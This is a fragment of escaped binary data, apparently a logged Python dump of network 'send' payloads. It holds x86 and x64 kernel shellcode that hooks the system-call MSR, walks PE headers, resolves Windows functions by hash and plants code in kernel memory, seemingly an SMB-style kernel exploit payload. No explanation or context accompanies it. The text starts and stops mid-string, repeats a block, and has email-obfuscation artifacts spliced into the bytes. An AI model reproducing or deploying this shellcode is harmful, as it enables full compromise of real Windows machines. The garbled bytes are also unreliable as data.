H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 4, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\